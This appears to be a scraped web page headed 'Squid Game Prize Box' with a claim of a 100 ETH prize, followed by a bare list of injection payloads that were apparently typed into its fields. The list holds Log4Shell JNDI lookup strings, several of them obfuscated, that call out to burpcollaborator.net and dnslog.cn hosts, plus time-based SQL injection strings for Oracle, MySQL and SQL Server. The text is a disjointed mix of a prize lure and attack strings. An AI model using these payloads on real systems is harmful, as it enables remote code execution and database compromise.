Squid Game Prize Box
Final Prize Is More Than 100 ETH
orwa'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),10)||' 

org.apache.logging.log4j.LogManager.getLogger("whatever").error("not safe {}", "${jndi:ldap://127.0.0.1:1234/abc}")



${jndi:ldap://5lrnmk8dpab8bnvv0r8atfdbv21tpi.burpcollaborator.net/aa}
${jndi:ldap://${jndi:ldap://12axtz.dnslog.cn/exp}/exp}
${jndi:ldap://127.0.0.1:8888/abc}
${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}ehz0ux2mqccikhz9nx5b8mrfo6uwil.burpcollaborator.net/rce}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5lrnmk8dpab8bnvv0r8atfdbv21tpi.burpcollaborator.net/a}

${${lower:${lower:jndi}}:${lower:rmi}://zce3ok.dnslog.cn/poc}

orwa' AND (SELECT 6377 FROM (SELECT(SLEEP(5)))hLTl)--
OR boolean-based blind - WHERE or HAVING clause (NOT)
OR boolean-based blind - WHERE or HAVING clause (NOT)
' WAITFOR DELAY '0:0:5'--
';WAITFOR DELAY '0:0:5'-- 
',0)waitfor delay'0:0:05'--